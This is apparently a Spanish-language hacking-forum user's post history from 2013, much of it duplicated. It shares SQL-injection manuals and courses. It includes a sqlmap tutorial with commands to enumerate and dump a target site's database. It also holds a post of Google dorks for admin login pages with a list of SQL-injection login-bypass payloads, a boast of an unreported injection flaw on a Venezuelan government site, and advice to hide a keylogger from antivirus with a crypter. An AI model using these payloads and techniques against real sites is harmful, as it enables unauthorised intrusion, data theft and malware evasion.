Excelente! a leerlo
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#22
Dudas y pedidos generales / Re:Ayuda con Keylogger
Septiembre 02, 2013, 03:47:34 PM
Usa algún crypter para que no lo pueda detectar ,
#23
Cursos, manuales y libros / Manuales y Guias SQLI
Agosto 25, 2013, 07:37:42 PM
Holaa Underc0de acá les comparto otros pdfs ! sobre Manuales y Guias SQLI
Contenido:
Introducción a las inyección sqli
ejemplos! de ataques
Técnicas
SQLMAP(python xD lo pongo ya que esta desarrollado en python)
y machas mas cosas
enlace : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
espero que lo entiendan
PD: no soy el autor y no puedo poner todos los cerditos ya que cada pdf esta echo por distinto autor ! lo siento :l pero se les agradece de todos modos ! !
y no me hago responsable con lo que aprendas y no hagan cagadas con lo que aprenden leyendo
Saludos !
Contenido:
Introducción a las inyección sqli
ejemplos! de ataques
Técnicas
SQLMAP(python xD lo pongo ya que esta desarrollado en python)
y machas mas cosas
enlace : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
espero que lo entiendan
PD: no soy el autor y no puedo poner todos los cerditos ya que cada pdf esta echo por distinto autor ! lo siento :l pero se les agradece de todos modos ! !
y no me hago responsable con lo que aprendas y no hagan cagadas con lo que aprenden leyendo
Saludos !
#24
Cursos, manuales y libros / Re:Pack de Manuales Mysql , Injection sql , xss ect
Agosto 25, 2013, 07:10:28 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaDe nada , lo tenia en mi la pc de hace muchoo xD y lo fui leyendo cosas que me gustaban y lo comparto aquí también !
Excelente recopilación, gracias por compartirlo!!
Salu2!
#25
Cursos, manuales y libros / Pack de Manuales Mysql , Injection sql , xss ect
Agosto 25, 2013, 12:53:06 PM
hola que tal Underc0de hace mucho tenia en mi ordenador un pack de muchas cosas pero muchoo y lo fui leyendo !
Cosas que tiene el pack :
sql Injection
cursos
cracking
BackTrack
Base de datos
Python
Programación !
y muchas cosas interesantes !!
tecnicas de inyeccion sql y mucho !!
Espero que lo lean !
Enlace: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
PD : no soy el autor de estos documentos ! , no puedo dar los créditos ya que son muchos ducumentos echos por distinta gente pero se les agradece a los que lo hicieron
Saludos!!!!!!!
Cosas que tiene el pack :
sql Injection
cursos
cracking
BackTrack
Base de datos
Python
Programación !
y muchas cosas interesantes !!
tecnicas de inyeccion sql y mucho !!
Espero que lo lean !
Enlace: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
PD : no soy el autor de estos documentos ! , no puedo dar los créditos ya que son muchos ducumentos echos por distinta gente pero se les agradece a los que lo hicieron
Saludos!!!!!!!
#26
Bugs y Exploits / Re:[Curso] SQL Injection desde 0 - Union based y Blind Boolean Based.
Agosto 25, 2013, 11:53:18 AM
Bueno esta bastante bien el curso mufero , los que recién andan entrando al tema les viene muy bien !
Saludos !
Saludos !
#27
Seguridad / Re:Como descargar el Navegador de the pirate bay
Agosto 22, 2013, 07:30:44 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El navegador NO es anonimo, simplemente evita la censura de algunas paginas que no se pueden acceder en los paises y ellos mismo lo dicen en su pagina: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta !
Un saludo
Sii yo también lo e visto eso !
Saludos!!!!!
#28
Seguridad / Como descargar el Navegador de the pirate bay
Agosto 21, 2013, 03:11:00 PM
Hola Gente de Underc0de Bueno les traigo este navegador
Aquí una imagen :
Su descarga : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una vez descargado lo ejecutan y lo descomprimen donde quieran
acá una imagen
y ya lo tendrían instalado
pd: ¿Para que sirve? pues no se si es 'algo' parecido a tor pero nos deja navegar 'anonimamente '
Saludos !!!!!!!!
Aquí una imagen :
Su descarga : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una vez descargado lo ejecutan y lo descomprimen donde quieran
acá una imagen
y ya lo tendrían instalado
pd: ¿Para que sirve? pues no se si es 'algo' parecido a tor pero nos deja navegar 'anonimamente '
Saludos !!!!!!!!
#29
Presentaciones y cumpleaños / Re:Saludos UnderC0de
Agosto 05, 2013, 07:41:00 PM
Bienvenido Bro!!!!! Te as Registrado en un Buen Lugar
#30
Bugs y Exploits / Re:Cross-Site Scripting [XSS] - 01
Agosto 05, 2013, 01:02:15 PM
Muy Bueno encima veo que es tu yo Nicee
#31
Dudas y pedidos generales / Re:¿Por que la pc se hacen lentas con el tiempo?
Agosto 03, 2013, 06:24:00 PM
Pues Puede aver archivos sin utilización , eliminarlos ,, Puedes descargar el CCleaner
Con el CCleaner puedes reparar errores del registro, limpiar el historial ect ect y siempre tener el anti-virus actualizado si hace falta descargar otro mejor ( ojo no tener 2 anti-virus ) solo uno ..
Con el CCleaner puedes reparar errores del registro, limpiar el historial ect ect y siempre tener el anti-virus actualizado si hace falta descargar otro mejor ( ojo no tener 2 anti-virus ) solo uno ..
#32
Pentesting / ¿Como Usar SQLMAP? Mini-Tutorial
Agosto 01, 2013, 09:50:18 PM
Hola Gente de Underc0de
¿Porque hago este tuto?
Bueno la verdad lo hago porque muchas personas tienen dudas : como? : ¿No lo se usar? , ¿No me abre?
Jjajaj cuando aveces tienen la duda de que no les abre es porque necesitan python , ya que la herramienta esa desarrollada en python
Seguir mis pasos
1-Descargar python
PD: Si tienen windows , descargar la versión de python para windows 7 , o el que tengan xD
Acá un panta (mio )
Python :
Descargar:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2- El Sqlmap
Pagina Oficial : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
PD: Es la oficial así que descarguen sin problem
Otro panta (mio
3- Cuando tengan Descargado todo Instalan el Python en el disco local C
no mía la imagen
4- y el sqlmap también copian y pegan en el disco local C
5- Esta es la parte que mas se equivocan porque algunos le pasa ¿Como lo abre?
Seguir mis pasos :
CMD (ABRIRLO)
Una vez abierto poner :
CD..
y otra vez CD.. y poner cd sqlmap
Imagen(mia)
Por ultimo
Tienen que hacer esto les dejos los comandos
COMANDOS :
1. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u ((buee su : (la pagina)TARGET.ASSED.COMxD) --dbs
2. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u ((buee su : (la pagina)TARGET.ASSED.COMxD) -D (Nombre de la BD) --tables
3. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u (buee su : (la pagina)TARGET.ASSED.COMxD) -D (Nombre de la BD) -T (Nom. de la tabla) --columns
4. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u (buee su : (la pagina)TARGET.ASSED.COMxD) -D (Nombre de la BD) -T (Nom. de la tabla) -C (Nom. de la columna) --dump
eso es todo Saludos !
PD: SIN LOS PARÉNTESIS AL PONER ,es decir , -u ejemplo -dbs (sqlmap.py)
¿Porque hago este tuto?
Bueno la verdad lo hago porque muchas personas tienen dudas : como? : ¿No lo se usar? , ¿No me abre?
Jjajaj cuando aveces tienen la duda de que no les abre es porque necesitan python , ya que la herramienta esa desarrollada en python
Seguir mis pasos
1-Descargar python
PD: Si tienen windows , descargar la versión de python para windows 7 , o el que tengan xD
Acá un panta (mio )
Python :
Descargar:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2- El Sqlmap
Pagina Oficial : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
PD: Es la oficial así que descarguen sin problem
Otro panta (mio
3- Cuando tengan Descargado todo Instalan el Python en el disco local C
no mía la imagen
4- y el sqlmap también copian y pegan en el disco local C
5- Esta es la parte que mas se equivocan porque algunos le pasa ¿Como lo abre?
Seguir mis pasos :
CMD (ABRIRLO)
Una vez abierto poner :
CD..
y otra vez CD.. y poner cd sqlmap
Imagen(mia)
Por ultimo
Tienen que hacer esto les dejos los comandos
COMANDOS :
1. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u ((buee su : (la pagina)TARGET.ASSED.COMxD) --dbs
2. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u ((buee su : (la pagina)TARGET.ASSED.COMxD) -D (Nombre de la BD) --tables
3. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u (buee su : (la pagina)TARGET.ASSED.COMxD) -D (Nombre de la BD) -T (Nom. de la tabla) --columns
4. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u (buee su : (la pagina)TARGET.ASSED.COMxD) -D (Nombre de la BD) -T (Nom. de la tabla) -C (Nom. de la columna) --dump
eso es todo Saludos !
PD: SIN LOS PARÉNTESIS AL PONER ,es decir , -u ejemplo -dbs (sqlmap.py)
#33
Presentaciones y cumpleaños / Re:Presentación | xBR5J0xNETx
Agosto 01, 2013, 06:18:43 PM
Bienvenido Bro , Ya veras que también aprenderás mas cosas
Saludos!
Saludos!
#34
Bugs y Exploits / Re:Union based SQL Inyeccion
Julio 31, 2013, 10:48:02 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaEse error me brotaba muy seguido, pero sigo sin entender, ¿debes poner 'columna1,columna2,columna3'?, o es algún ejemplo?. :sNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No entiendo :/
lo de select columna1,columna2,columna3 from tabla where id='967' Union Select 1,2,3 -- - ' ya no lo entendí
Tengo una pagina vulnerable, la estoy usando como practica jajaja, pero no entiendo eso.
Saludos
Significa como es que esta formada la consulta en realidad por dentro, siempre que estes haciendo una inyeccion sql necesitas imaginar como el programador, en este caso para usar UNION siempre se deben usar el mismo numero de columnas en este caso 3 de esa manera la union estara realizada correctamente, si no te arroja un error The used SELECT statements have a different number of columns saludos
Se refiere a columna1,columna2,columna3 : 1,2,3
Sal2
#35
Pentesting / Re:Clases Inyeccion SQL Por Omar Palomino (SQLI)
Julio 31, 2013, 01:32:40 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tendre que bajarlos y hecharles una revisada, estoy muy oxidado en SQLi
Vale que buen aporte, y vamos a ver si este hombre sigue compartiendo conocimiento
Pues Si son muy buenos
Sal2
#36
Pentesting / [SQL] Bypass Admin Panel
Julio 30, 2013, 11:58:38 PM
Bueno como dice hoy are un tutorial sobre el bypass admin panel (SQL) ,es decir, bypasear panel (admin)
algunos dorks
Dorks :
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
lo aremos con una simple consulta SQL
,,,
Acá una imagen (mía)
algunos tipos de consultas :
' or 1=1 –
1'or'1'='1
admin'–
" or 0=0 –
or 0=0 –
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1–
" or 1=1–
or 1=1–
' or a=a–
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 –
hi' or 1=1 –
Sitio que use de ejemplo : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno Un saludo Undercode
algunos dorks
Dorks :
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
lo aremos con una simple consulta SQL
,,,
Acá una imagen (mía)
algunos tipos de consultas :
' or 1=1 –
1'or'1'='1
admin'–
" or 0=0 –
or 0=0 –
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1–
" or 1=1–
or 1=1–
' or a=a–
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 –
hi' or 1=1 –
Sitio que use de ejemplo : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno Un saludo Undercode
#37
Hacking ShowOff / SQLi Gobierno De Venezuela
Julio 30, 2013, 10:17:20 PM
Hola Gente Andando por ahi entre a la pagina del gob de Vene me puse a ver unas cosas y me tope
con una vulne SQLI
Reportada: No
Imagen :
pd: me la encontré googleando el sitio ese de vene (gob)
Salu2
con una vulne SQLI
Reportada: No
Imagen :
pd: me la encontré googleando el sitio ese de vene (gob)
Salu2
#38
Pentesting / Re:Clases Inyeccion SQL Por Omar Palomino (SQLI)
Julio 30, 2013, 10:02:00 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaEhh en realidad eso se encuentra en muchos lados nada mas que hay tutoriales pero no explican cosas ,, como esta explicando el
Me gustaria que hubiera mas como el, comparte valioso conocimiento gratis xD
Sal2
#39
Hacking / Re:Sql Injection manualmente (Matabarras-Morenako)
Julio 30, 2013, 07:57:35 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
buena data... pero yo soy de los tipicos lammers que le gustan las cosas rapidas con solo un programa., Que recomiendan como el mejor de todos¿?.....el pangolin professional editions, el havij 1.6......o cual¿? yo resien use el pangolin y inyecte una pagina de la cual ya sabia que se podria sacar su password y nick de usuario pero no se porque no se le cargo la data de la base de datos ahora estoy bajando havij 1.6.....recomiendenme algo que si sirva!!! gracias \☻/ soy nuevo por aca... buen foro •saludos•
Faquir Hola Pues sinceramente si no lo haces de manual intenta con SQLMAP O THEMOLE , Havij no me gusta de nda así que si lo vas a hacer automatizado hazlo con : sqlmap , necesitaras de python ya que la herramienta es desarrollada por python
Sal2
#40
Pentesting / Clases Inyeccion SQL Por Omar Palomino (SQLI)
Julio 30, 2013, 07:47:10 PM
Hola Underc0de Soy Nuevo en la comunidad , recién ando empezando pero e aprendido poco a poco con temitas muy buenos que hay a qui en la comunidad
Bueno me vi una clases de SQL inyeccion son muy buenas las recomiendo
CLASE 1 :
1.- Concepto de SQLi (SQL Injection)
2.- Entender como funciona MySQL
3.- ¿Cómo identificar las inyecciones SQL?
- Concatenaciones
- Operadores matemáticos
- Errores
4.- Entendiendo los distintos tipos de sentencias SQL
Clase 2
1. Herramientas que nos ayudan a identificar SQLi
2. Obtener información a través de SQLi
3. Inyecciones basadas en UNIONES
- Obtener número columnas con ORDER BY: Búsqueda binaria
- Realizando la inyección con uniones
4. Funciones básicas de MySQL
- Función: Database, user, current_user, datadir
5. Funciones de concatenación: CONCAT, GROUP_CONCAT, CONCAT_WS
5. Analizando la base de datos: INFORMATION_SCHEMA
Clase 3 :
1. Obtener información(registros) de las Bases de Datos
2. Obtener información de la Base de Datos MYSQL
- Tabla User
- Doble SHA1, funcion password
3. Craking de contraseñas
- Rainbow tables
4. Ataques con SQLMAP
y por ultimo la clase 4
Clase 4 :
1. Desarrollo de script en python para automatizar SQLi <- este esta excelente
2. Inyección de código en páginas web vulnerables
Bueno para los que no saben lo que es la inyeccion sql
Buena la inyeccion sql es un metodo de infiltracionn de codigo intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar consultas a una base de datos.
Sal2
Espero que les guste
PD : SI NO TIENES MUCHA IDEA NO ENTENDERÁS LAS CLASES AL TOQUE CUANDO LAS VEAS , VELAS BARIAS VECES
Bueno me vi una clases de SQL inyeccion son muy buenas las recomiendo
CLASE 1 :
1.- Concepto de SQLi (SQL Injection)
2.- Entender como funciona MySQL
3.- ¿Cómo identificar las inyecciones SQL?
- Concatenaciones
- Operadores matemáticos
- Errores
4.- Entendiendo los distintos tipos de sentencias SQL
Clase 2
1. Herramientas que nos ayudan a identificar SQLi
2. Obtener información a través de SQLi
3. Inyecciones basadas en UNIONES
- Obtener número columnas con ORDER BY: Búsqueda binaria
- Realizando la inyección con uniones
4. Funciones básicas de MySQL
- Función: Database, user, current_user, datadir
5. Funciones de concatenación: CONCAT, GROUP_CONCAT, CONCAT_WS
5. Analizando la base de datos: INFORMATION_SCHEMA
Clase 3 :
1. Obtener información(registros) de las Bases de Datos
2. Obtener información de la Base de Datos MYSQL
- Tabla User
- Doble SHA1, funcion password
3. Craking de contraseñas
- Rainbow tables
4. Ataques con SQLMAP
y por ultimo la clase 4
Clase 4 :
1. Desarrollo de script en python para automatizar SQLi <- este esta excelente
2. Inyección de código en páginas web vulnerables
Bueno para los que no saben lo que es la inyeccion sql
Buena la inyeccion sql es un metodo de infiltracionn de codigo intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar consultas a una base de datos.
Sal2
Espero que les guste
PD : SI NO TIENES MUCHA IDEA NO ENTENDERÁS LAS CLASES AL TOQUE CUANDO LAS VEAS , VELAS BARIAS VECES